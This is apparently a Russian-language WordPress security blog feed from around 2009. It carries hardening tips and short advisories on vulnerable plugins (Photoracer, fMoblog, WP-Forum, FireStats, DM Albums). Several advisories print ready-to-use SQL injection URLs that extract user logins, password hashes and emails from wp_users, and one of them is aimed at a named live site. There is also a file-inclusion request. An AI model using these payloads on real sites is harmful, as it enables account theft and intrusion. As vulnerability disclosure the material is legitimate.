Скрываем сообщение о ошибке при логине.
Дабы усложнить перебор паролей к вашему WordPress-блогу, можно попросить его не показывать сообщения об ошибке при попытках неправильного входа в блог, таким образом злоумышленник не увидит в чем суть проблемы, несуществующий пользователь или неправильный пароль.
Для этого, необходимо отредактировать файл functions.php и вставить следующую строчку:
add_filter('login_errors',create_function('$a', "return null;"));
Popularity: 63% []
Уязвимость в файле wp-trackback.php
Свежая уязвимость в WordPress которая позволяет провести DOS атаку на блог жертвы используя файл wp-trackback.php
Отключение трекбэков не избавляет от данной уязвимости, для того, чтобы обезопасить свой блог, необходимо установить плагин, который исправляет данную проблему.
Плагин можно скачать
Эксплоит уязвимости:
Источник: blogproblog.com/wp-trackback_dos_attack/
Popularity: 32% []
Уязвимость WordPress плагина DM Albums
В WordPress плагине DM Albums найдена уязвимость, которая позволяет злоумышленнику удаленно выполнить произвольный PHP файл на сервере жертвы.
Уязвимость возникла в связи с небезопасной обработкой входящих данных, в переменной SECURITY_FILE в файле album.php.
Благодаря этой уязвимости, может быть выполнен любой PHP файл, на системе жертвы, с правами доступа Web-сервера.
.
Popularity: 35% []
Уязвимость WordPress плагина Photoracer 1.0
В плагине Photoracer 1.0 найдена уязвимость типа SQL-injection, которая позволяет злоумышленнику выполнить любые команды в базе данных WordPress блога.
Данная уязвимость обеспечивается недостаточной обработкой данных, которые передаются скрипту viewimg.php. С помощью такого запроса, можно выполнять команды к базе данных:
http://site.pl/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+0,1,2,3,4,user(),6,7,8--
Рекомендуется отключить плагин, до исправления ошибки или выхода новой версии.
Popularity: 34% []
Уязвимость в WordPress плагине FireStats 1.6.1
Из-за неправильной обработки входных данных, злоумышленник может воспользоваться уязвимостью в плагине FireStats и выполнить любой сценарий с правами веб-сервера.
Передав имя файла, плагину, с помощью аргументов адресной строки, злоумышленник может передать имя файла, которое находится где-то на сервере.
Пример запроса: http://www.TARGET.com/[path]/wp-content/plugins/firestats/firestats-wordpress.php?fs_javascript=[darkc0de]
Popularity: 31% []
Защита от перебора паролей в WordPress
Для того, чтобы обезопасить свой блог, от взлома путем перебора паролей, необходимо установить ограничение количества неправильных логинов, в этом случае бот или человек, который задумает подобрать пароль к Вашему блогу, после определенного количества неправильных логинов, будет забанен на определенное время.
Сделать это можно очень легко, достаточно просто скачать и установить . (как установить плагин)
- Плагин позволяет настроить количество неправильных логинов, до того как забанить пользователя.
- Плагин показывает пользователю сколько попыток осталось
- Плагин показывает пользователю сколько времени осталось до следующей возможности логина
- Отправляет уведомление администратору о том, что были попытки подобрать пароль
Устанавливайте плагин и делайте ваш WordPress блог более безопасным.
Popularity: 42% []
Уязвимость WordPress плагина fMoblog 2.1
Найдена уязвимость в WordPress плагине fMoblog, которая позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных WordPress.
Уязвимость существует из-за недостаточной обработки входных данных в параметре «id».
Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
# Exploit:
http://www.site.com/?page_id=[valid_id]&id=-999+union+all+select+1,2,3,4,gr
oup_concat(user_login,0x3a,user_pass,0x3a,user_email),6+from+wp_users--
# Demo:
http://www.tarynitup.com/?page_id=20&id=-999+union+all+select+1,2,3,4,group
_concat(user_login,0x3a,user_pass,0x3a,user_email),6+from+wp_users--
Popularity: 33% []
Уязвимость в WordPress MU < 2.7
Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему.
Уязвимость существует из-за ошибки в функции choose_primary_blog при проверке HOST заголовка.
Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта.
Для устранения уязвимости рекомендуется обновить WordPress MU до версии 2.7
.
Popularity: 26% []
Уязвимость WordPress плагина WP-Forum 1.7.8
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «thread» сценарием forum_feed.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Эксплоит:
http://site.com/blog/wp-content/plugins/wp-forum/forum_feed.php?thread=[SQL]
http://site.com/blog/wp-content/plugins/wp-forum/forum_feed.php?thread=-99999+union+select+1,2,3,concat(user_login,0x2f,user_pass,0x2f,user_email),5,6,7+from+wp_users/*
Popularity: 95% []
Уязвимость в WordPress ниже 2.6.3
Если вы еще не обновили свой блог, до версии 2.7, которая на данный момент является финальной стабильной версией WordPress, возможно некоторые уязвимости в старых версиях WordPress заставят вас задуматься об этом.
Jeremias Reith опубликовал уязвимость на сервис которая при удачном использовании позволяет злоумышленнику, получить доступ к панели администрирования вашего блога.
Данная уязвимость исправлена в версии WordPress 2.6.5, но желательно обновлять блог, до последней версии WordPress 2.7
Popularity: 27% []
